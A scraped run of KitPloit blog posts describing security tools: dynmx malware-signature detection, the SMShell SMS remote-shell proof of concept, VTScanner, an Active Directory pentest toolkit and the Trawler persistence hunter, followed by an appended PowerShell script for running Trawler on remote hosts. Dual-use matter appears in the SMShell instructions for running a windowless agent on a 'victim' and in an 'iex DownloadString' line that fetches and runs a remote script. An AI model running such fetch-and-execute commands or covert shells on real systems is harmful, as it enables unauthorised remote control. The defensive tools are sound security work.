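<p dir="auto">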
The usage information can be viewed with the <code>-h</code> <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> parameter as shown below.</p> <div><pre><code>$ python3 dynmx.py -h<br />usage: dynmx.py [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...<br /><br />Detect dynmx signatures in dynamic program execution information (function logs)<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --format {overview,detail}, -f {overview,detail}<br /> Output format<br /> --show-log Show all log output on stdout<br /> --log LOG, -l LOG log file<br /> --log-level {debug,info,error}<br /> Log level (default: info)<br /> --worker N, -w N Number of workers to spawn (default: number of processors - 2)<br /><br />sub-commands:<br /> task to perform<br /><br /> {detect,check,convert,stats,resources}<br /> detect Detects a dynmx signature<br /> check Checks the syntax of dynmx signature(s)<br /> convert Converts function logs to the dynmx generic function log format<br /> stats Statistics of function logs<br /> resources Resource activity derived from function log<br /></code></pre></div> <p dir="auto">In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs to be chosen to run a specific task. Please note that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands <code>detect</code> and <code>convert</code>.</p> <p dir="auto">The commands have specific command line parameters that can be explored by giving the parameter <code>-h</code> to the command, e.g. 
for the <code>detect</code> command as shown below.</p> <div><pre><code>$ python3 dynmx.py detect -h<br />usage: dynmx.py detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --recursive, -r Search for input files recursively<br /> --json-result JSON_RESULT<br /> JSON formatted result file<br /> --runtime-result RUNTIME_RESULT<br /> Runtime statistics file formatted in CSV<br /> --detect-all Detect signature in all processes and do not stop after the first detection<br /><br />required arguments:<br /> --sig SIG [SIG ...], -s SIG [SIG ...]<br /> dynmx signature(s) to detect<br /> --input INPUT [INPUT ...], -i INPUT [INPUT ...]<br /> Input files<br /></code></pre></div> <p dir="auto">As a user of <em>dynmx</em>, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter <code>--show-log</code>, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the <code>--log</code> parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.</p> <div><pre><code><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Log output<br />2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run<br />[...]<br />[+] End of log output<br /><br />[+] Result<br />[...]<br /></code></pre></div> <p dir="auto">The level of detail of the result output can be defined using the command line parameter <code>--format</code> (<code>-f</code>, see the usage output above), which can be set to <code>overview</code> for a high-level result or to <code>detail</code> for a detailed result. For example, if you set the output format to <code>detail</code>, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate which signature was detected in which function log.</p> <h2 dir="auto" tabindex="-1">Example Command Lines</h2> <p dir="auto">Detection of a <em>dynmx</em> signature in a function log with one worker process</p> <div><pre><code>python3 dynmx.py -w 1 detect -i "flog.txt" -s dynmx_signature.yml<br /></code></pre></div> <p dir="auto">Conversion of a function log to the <em>dynmx</em> generic function log format</p> <div><pre><code>python3 dynmx.py convert -i "flog.txt" -o /tmp/<br /></code></pre></div> <p dir="auto">Check a signature (only basic sanity checks)</p> <div><pre><code>python3 dynmx.py check -s dynmx_signature.yml<br /></code></pre></div> <p dir="auto">Get a detailed list of the resources used by a malware sample based on the function log (access activity model)</p> <div><pre><code>python3 dynmx.py -f detail resources -i "flog.txt"<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Troubleshooting</h2> <p dir="auto">Please consider that this tool is a proof-of-concept which was developed alongside the master's thesis. Hence, the <a href="https://www.kitploit.com/search/label/Code%20Quality" target="_blank" title="code quality">code quality</a> is not always the best and there may be bugs and errors. 
I tried to make the tool as robust as possible in the given time frame.</p> <p dir="auto">The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to <code>debug</code>. Exception handlers should write detailed errors to the log which can help troubleshooting.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0x534a/dynmx" rel="nofollow" target="_blank" title="Download Dynmx">Download Dynmx</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-75848228572884862862023-09-19T08:30:00.001-03:002023-09-19T08:30:00.178-03:00SMShell - Send Commands And Receive Responses Over SMS From Mobile Broadband Capable Computers<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/s1585/SMShell_1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="835" data-original-width="1585" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/w640-h338/SMShell_1.gif" width="640" /></a></div><div><br /></div> <p dir="auto">PoC for an SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers.</p> <p dir="auto">This tool came as an inspiration during <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> on eSIM security implications led by Markus Vervier, presented at <a href="https://www.offensivecon.org/speakers/2023/markus-vervier.html" rel="nofollow" target="_blank" title="Offensivecon 2023">Offensivecon 2023</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Disclaimer</h1> <p dir="auto">This is not a complete C2 but rather a simple Proof of Concept for executing commands remotely over SMS.</p> <h1 dir="auto" tabindex="-1">Requirements</h1> <p dir="auto">For the shell to work you need two devices capable of sending SMS. The victim's computer should be equipped with a WWAN module with either a physical SIM or an eSIM deployed.</p> <p dir="auto">On the operator's end, two tools are provided:</p> <ul dir="auto"> <li>.NET <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> which uses an <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> WWAN module</li> <li>Python script which uses an external Huawei MiFi through its API</li> </ul> <p dir="auto">Of course, you could in theory use any online SMS provider on the operator's end via their API.</p> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto">On the victim, simply execute the <code>client-agent.exe</code> binary. If the agent is compiled as a <code>Console Application</code> you should see some verbose messages. 
If it's compiled as a <code>Windows Application</code> (best for real engagements), there will be no GUI.</p> <p dir="auto">The operator must specify the victim's <a href="https://www.kitploit.com/search/label/Phone%20Number" target="_blank" title="phone number">phone number</a> as a parameter:</p> <div><pre><code>server-console.exe +306912345678<br /></code></pre></div> <p dir="auto">If you use the Python script instead, you must additionally specify the MiFi details:</p> <div><pre><code>python3 server-console.py --mifi-ip 192.168.0.1 --mifi-username admin --mifi-password 12345678 --number +306912345678 -v<br /></code></pre></div> <p dir="auto">A demo as presented by Markus at Offensivecon is shown below. On the left is the operator's VM with a MiFi attached, whereas the right window is the client agent.</p><p dir="auto"><br /></p><p dir="auto" style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/s1585/SMShell_1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="835" data-original-width="1585" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/w640-h338/SMShell_1.gif" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/persistent-security/SMShell" rel="nofollow" target="_blank" title="Download SMShell">Download 
SMShell</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-66521425519389685242023-09-12T08:30:00.001-03:002023-09-12T08:30:00.142-03:00VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIRgOpMXPL80PBTZ2O22sWdg-EYxdHhOhl4n1K9srd07zMTGGS0z6o6HF83FH8UYJmt_Z-J66Y4jANVC_5LC8TYdbSO1U1ay_PZuVC96Ow2VNc5bMt7Iva5HPw8Xcu5hCpl5TXtLP_TSmZxQjxHD9mVZILHhWMj2G-IkQn44tfeXYhtxiStMXRvdKdbWsZ"><img alt="" border="0" height="364" id="BLOGGER_PHOTO_ID_7276633524747992834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIRgOpMXPL80PBTZ2O22sWdg-EYxdHhOhl4n1K9srd07zMTGGS0z6o6HF83FH8UYJmt_Z-J66Y4jANVC_5LC8TYdbSO1U1ay_PZuVC96Ow2VNc5bMt7Iva5HPw8Xcu5hCpl5TXtLP_TSmZxQjxHD9mVZILHhWMj2G-IkQn44tfeXYhtxiStMXRvdKdbWsZ=w640-h364" width="640" /></a></div><div><br /></div> <p dir="auto">VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> for <a href="https://www.kitploit.com/search/label/Malware%20Detection" target="_blank" title="malware detection">malware detection</a> and analysis. It seamlessly integrates with the <a href="https://www.kitploit.com/search/label/VirusTotal" target="_blank" title="VirusTotal">VirusTotal</a> API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Features</h2> <h3 dir="auto" tabindex="-1">1. Directory-Based Scanning</h3> <p dir="auto">VTScanner enables users to choose a specific directory for scanning. 
By doing so, you can assess all the files within that directory for potential malware threats.</p> <h3 dir="auto" tabindex="-1">2. Detailed Scan Reports</h3> <p dir="auto">Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.</p> <h3 dir="auto" tabindex="-1">3. Hash-Based Checks</h3> <p dir="auto">VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.</p> <h3 dir="auto" tabindex="-1">4. VirusTotal Integration</h3> <p dir="auto">VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.</p> <h3 dir="auto" tabindex="-1">5. Time Delay Functionality</h3> <p dir="auto">For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with VirusTotal's rate limits.</p> <h3 dir="auto" tabindex="-1">6. Premium API Support</h3> <p dir="auto">If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.</p> <h3 dir="auto" tabindex="-1">7. Interactive VirusTotal Exploration</h3> <p dir="auto">VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.</p> <h3 dir="auto" tabindex="-1">8. 
Preinstalled Windows Binaries</h3> <p dir="auto">For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> scanners.</p> <h3 dir="auto" tabindex="-1">9. Custom Binary Generation</h3> <p dir="auto">If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <h3 dir="auto" tabindex="-1">Prerequisites</h3> <p dir="auto">Before installing VTScanner, make sure you have the following prerequisites in place:</p> <ul dir="auto"> <li>Python 3.6 installed on your system.</li> </ul> <div><pre><code>pip install -r requirements.txt</code></pre></div> <h3 dir="auto" tabindex="-1">Download VTScanner</h3> <p dir="auto">You can acquire VTScanner by cloning the GitHub repository to your local machine:</p> <div><pre><code>git clone https://github.com/samhaxr/VTScanner.git<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Usage</h3> <p dir="auto">To initiate VTScanner, follow these steps:</p> <div><pre><code>cd VTScanner<br />python3 VTScanner.py<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Configuration</h3> <ul dir="auto"> <li>Set the time delay between scan requests.</li> <li>Enter your VirusTotal API key in config.ini</li> </ul> <h3 dir="auto" tabindex="-1">License</h3> <p dir="auto">VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.</p> <h3 dir="auto" tabindex="-1">Disclaimer</h3> <p dir="auto">VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. 
For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/samhaxr/VTScanner" rel="nofollow" target="_blank" title="Download VTScanner">Download VTScanner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-66344737802191381942023-08-22T08:30:00.001-04:002023-08-22T08:30:00.144-04:00AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIemmmtBAOzO8tO-WNrHIXpd_K2YRr7MqNCHwpRRq7DFcdCbcXERB8GtoJeX2rELvtWfgo0HSJQri_dCJtTB9JwyvqiZ4NlVcFWW2UNY5s1k3rMjUgIABoNo8CwkimaJRTz7gZKpvCeAingo2EwIWJ0xeUnvnyhrUC04AnoXOqVBE2T7jM7w7q0zLXoFr_/s225/AD_Enumeration_Hunt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIemmmtBAOzO8tO-WNrHIXpd_K2YRr7MqNCHwpRRq7DFcdCbcXERB8GtoJeX2rELvtWfgo0HSJQri_dCJtTB9JwyvqiZ4NlVcFWW2UNY5s1k3rMjUgIABoNo8CwkimaJRTz7gZKpvCeAingo2EwIWJ0xeUnvnyhrUC04AnoXOqVBE2T7jM7w7q0zLXoFr_/w400-h400/AD_Enumeration_Hunt.png" width="400" /></a></div><p><br /></p> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Welcome to the AD Pentesting Toolkit! 
This repository contains a collection of PowerShell scripts and commands that can be used for <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> (AD) <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.</p> <p dir="auto">The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper <a href="https://www.kitploit.com/search/label/Authorization" target="_blank" title="authorization">authorization</a> and permission before using these scripts in any production environment.</p> <p dir="auto">Everyone is looking at what you are looking at; But can everyone see what he can see? 
You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Features</h2> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/64872731/258566614-456c87fa-8480-4fae-8dfa-1b7288303ace.gif" rel="nofollow" target="_blank" title="$ (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXIl6KSRfJK0J5neHiEPni0loBd0z_mo2OZgdWfDajTZxz26-pmfiQD41nJ8EuP-2WzAnufSAApb9MeuKE2uwR8ITGnUZqDVNs4gk5AeQBCEFHED7N09HoNwhcb9UivYzotqgq3fBcS0JQS6hMzDfPys4S4iY60FUgiWEWe8THf_WHwkDIJGbzCsNjBW4l"><img alt="" border="0" height="328" id="BLOGGER_PHOTO_ID_7265043511742729218" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXIl6KSRfJK0J5neHiEPni0loBd0z_mo2OZgdWfDajTZxz26-pmfiQD41nJ8EuP-2WzAnufSAApb9MeuKE2uwR8ITGnUZqDVNs4gk5AeQBCEFHED7N09HoNwhcb9UivYzotqgq3fBcS0JQS6hMzDfPys4S4iY60FUgiWEWe8THf_WHwkDIJGbzCsNjBW4l=w640-h328" width="640" /></a></p> <ul dir="auto"> <li>Enumerate and gather information about AD domains, users, groups, and computers.</li> <li>Check trust relationships between domains.</li> <li>List all objects inside a specific Organizational Unit (OU).</li> <li>Retrieve information about the currently logged-in user.</li> <li>Perform various operations related to local users and groups.</li> <li>Configure firewall rules and enable <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="Remote Desktop">Remote Desktop</a> (RDP).</li> <li>Connect to remote machines using RDP.</li> <li>Gather network and security information.</li> <li>Check <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> status and exclusions configured via GPO.</li> <li>...and more!</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <ol dir="auto"> <li>Clone the repository or download the scripts as needed.</li> <li>Run the PowerShell script using the 
appropriate PowerShell environment.</li> <li>Follow the on-screen prompts to provide domain, username, and password when required.</li> <li>Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!</li> </ol> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p dir="auto">The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the <a href="https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/LICENSE" rel="nofollow" target="_blank" title="MIT License">MIT License</a>. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.</p> <h2 dir="auto" tabindex="-1">Cyber Security Consultant </h2><p dir="auto"><a href="https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/" rel="nofollow" target="_blank" title="Alperen Ugurlu">Alperen Ugurlu</a></p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/alperenugurlu/AD_Enumeration_Hunt" rel="nofollow" target="_blank" title="Download AD_Enumeration_Hunt">Download AD_Enumeration_Hunt</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17704117886219203702023-08-15T08:30:00.013-04:002023-08-15T08:30:00.149-04:00Trawler - PowerShell Script To Help Incident Responders Discover Adversary Persistence Mechanisms<div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY9kq-VlmQ2IPwPbzUkWZkGRpKdmY0KHmM-OqvdIxCG5crNfC_iXNOeHyun8_ZtH2NaDqCfSd5kXcvUquqVBo88fJrRimXs3Jzj4KtynCFeV1x0RoApBDhAXFlpnt7HlS4muwO0R63pfdwuB62qCkarMamWPqJHR2Kj3lYSAGc8zL0Scs3dzhXnGT-nqSv/s2000/Trawler_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1668" data-original-width="2000" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY9kq-VlmQ2IPwPbzUkWZkGRpKdmY0KHmM-OqvdIxCG5crNfC_iXNOeHyun8_ZtH2NaDqCfSd5kXcvUquqVBo88fJrRimXs3Jzj4KtynCFeV1x0RoApBDhAXFlpnt7HlS4muwO0R63pfdwuB62qCkarMamWPqJHR2Kj3lYSAGc8zL0Scs3dzhXnGT-nqSv/w400-h334/Trawler_1_logo.png" width="400" /></a></div><p align="center" dir="auto"><br /></p>
<h1 align="center" dir="auto" tabindex="-1">
Dredging Windows for Persistence
</h1>
<h2 dir="auto" tabindex="-1">What is it?</h2>
<p dir="auto">Trawler is a PowerShell script designed to help Incident Responders discover potential <a href="https://www.kitploit.com/search/label/Indicators%20of%20Compromise" target="_blank" title="indicators of compromise">indicators of compromise</a> on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.</p>
<p dir="auto">Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.</p><span><a name='more'></a></span><p dir="auto"><br /></p>
<h2 dir="auto" tabindex="-1">Main Features</h2>
<ul dir="auto">
<li>Scanning Windows OS for a variety of persistence techniques (Listed below)</li>
<li>CSV Output with MITRE Technique and Investigation Jumpstart Metadata</li>
<li>Analysis and Remediation Guidance Documentation (<a href="https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance" rel="nofollow" target="_blank" title="https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance">https://github.com/joeavanzato/Trawler/wiki/Analysis-and-Remediation-Guidance</a>)</li>
<li>Dynamic Risk Assignment for each detection</li>
<li>Built-in Allow Lists for common Windows configurations spanning Windows 10/Server 2012|2016|2019|2022 to reduce noise</li>
<li>Capture persistence metadata from 'golden' enterprise image for use as a dynamic allow-list at runtime</li>
<li>Analyze mounted disk images via drive re-targeting</li>
</ul>
<h2 dir="auto" tabindex="-1">How do I use it?</h2>
<p dir="auto">Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.</p>
<p dir="auto">Or use this one-liner from an Administrative PowerShell terminal:</p>
<div><pre><code>iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))<br /></code></pre></div>
<p dir="auto">Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.</p>
<p dir="auto">If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.</p>
<p dir="auto">Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.</p>
<h3 dir="auto" tabindex="-1">CLI Parameters</h3>
<div><pre><code>-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)<br />-hide : Suppress Detection output to console<br />-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"<br />-snapshotpath : Define a custom file-path for saving snapshot output to.<br />-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")<br />-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference<br />-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes<br /></code></pre></div>
<h2 dir="auto" tabindex="-1">What separates this from PersistenceSniper?</h2>
<p dir="auto">PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities:</p>
<ul dir="auto">
<li>trawler is (currently) a local utility - it would be pretty straight-forward to wrap it in a loop and use WinRM/PowerShell Sessions to execute it on remote hosts though</li>
<li>trawler implements allow-listing for many 'noisy' detections to help remove expected detections from default configurations of Windows (10/2016/2019/2022) and these are constantly being updated
<ul dir="auto">
<li>PersistenceSniper (for the most part) does not contain any type of allow-listing - therefore, there is more noise generated when considering items such as Services, Scheduled Tasks, general COM DLL scanning, etc.</li>
</ul>
</li>
<li>trawler's output is much simpler - Name, Risk, Source, MITRE Technique and Metadata are the only items provided for each detection, to help analysts jump-start their persistence hunting efforts</li>
<li>Regex is used in many checks to help detect 'suspicious' keywords or patterns in various critical areas including scanned file contents, registry values, etc.</li>
<li>trawler supports 'snapshotting' a system (for example, an enterprise golden image) then using the generated snapshot as an allow-list to reduce noise.</li>
<li>trawler supports 'drive-retargeting' to check dead-boxes mounted to an analysis machine.</li>
</ul>
<p dir="auto">Overall, these tools are extremely similar but approach the problem from slightly different angles - <a href="https://www.kitploit.com/search/label/PersistenceSniper" target="_blank" title="PersistenceSniper">PersistenceSniper</a> provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.</p>
<h2 dir="auto" tabindex="-1">Tuning to your environment</h2>
<p dir="auto">Trawler supports loading an allow-list from a 'snapshot' - this requires two steps.</p>
<ol dir="auto">
<li>Run <code>.\trawler.ps1 -snapshot</code> on a "Golden Image" representing the servers in your environment - once complete, in addition to the standard 'detections.csv', a file named 'snapshots.csv' will be generated</li>
<li>This file can then be used as input to trawler when running on other hosts and the data will be loaded dynamically as an allow-list for each appropriate detection
<ol dir="auto">
<li><code>.\trawler.ps1 -loadsnapshot "path\to\snapshot.csv"</code></li>
</ol>
</li>
</ol>
<p dir="auto">That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.</p>
<p dir="auto">(Allow-listing is implemented for most of the checks but not all - still being actively implemented)</p>
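<p dir="auto">The two-step workflow above, as an added example that is not Trawler's own code: the allow-list snapshot is taken once on the golden image, then the script and snapshot are staged on each host over PowerShell Remoting (the WinRM approach mentioned earlier), the scan runs with the snapshot loaded, and the returned detections.csv files are merged. Host names, the staging directory and the output folder are constructed placeholders; the 'Risk' column name is taken from the output fields listed above; the switches used are the ones documented under CLI Parameters.</p>

```powershell
# Added example, not part of the Trawler project. Assumes WinRM/PowerShell Remoting is
# enabled on the targets, the caller is a local administrator there, and trawler.ps1
# plus a golden-image snapshot.csv sit in the current directory.
# Host names, directories and file names below are constructed placeholders.

$Targets   = @('SRV-APP-01', 'SRV-APP-02')   # constructed host names
$RemoteDir = 'C:\Temp\trawler'               # staging directory on each target
$LocalOut  = '.\fleet-detections'            # one CSV per host lands here
New-Item -ItemType Directory -Path $LocalOut -Force | Out-Null

# Step 1 (done once, on the golden image itself) produces the allow-list:
#   .\trawler.ps1 -snapshot -snapshotpath .\snapshot.csv

# Step 2: stage script + snapshot, run trawler with the snapshot as allow-list,
# and pull detections.csv back from each host.
foreach ($target in $Targets) {
    $session = $null
    try {
        $session = New-PSSession -ComputerName $target -ErrorAction Stop

        Invoke-Command -Session $session -ArgumentList $RemoteDir -ScriptBlock {
            param($dir)
            New-Item -ItemType Directory -Path $dir -Force | Out-Null
        }
        Copy-Item -Path .\trawler.ps1, .\snapshot.csv -Destination $RemoteDir -ToSession $session

        Invoke-Command -Session $session -ArgumentList $RemoteDir -ScriptBlock {
            param($dir)
            Set-Location $dir
            # -hide keeps the remote console quiet; -loadsnapshot/-outpath are documented switches.
            .\trawler.ps1 -loadsnapshot (Join-Path $dir 'snapshot.csv') `
                          -outpath (Join-Path $dir 'detections.csv') -hide
        }

        Copy-Item -Path (Join-Path $RemoteDir 'detections.csv') `
                  -Destination (Join-Path $LocalOut "$target.csv") -FromSession $session
    }
    catch {
        Write-Warning "$target : $($_.Exception.Message)"
    }
    finally {
        if ($session) { Remove-PSSession $session }
    }
}

# Step 3: merge the per-host files, tag each row with its host, and summarise by Risk.
$all = Get-ChildItem -Path $LocalOut -Filter '*.csv' |
    Where-Object { $_.Name -ne 'all-detections.csv' } |
    ForEach-Object {
        $hostName = $_.BaseName
        Import-Csv -Path $_.FullName | Select-Object @{ n = 'Host'; e = { $hostName } }, *
    }
$all | Export-Csv -Path (Join-Path $LocalOut 'all-detections.csv') -NoTypeInformation
$all | Group-Object -Property Risk | Sort-Object -Property Count -Descending |
    Select-Object -Property Name, Count | Format-Table -AutoSize
```

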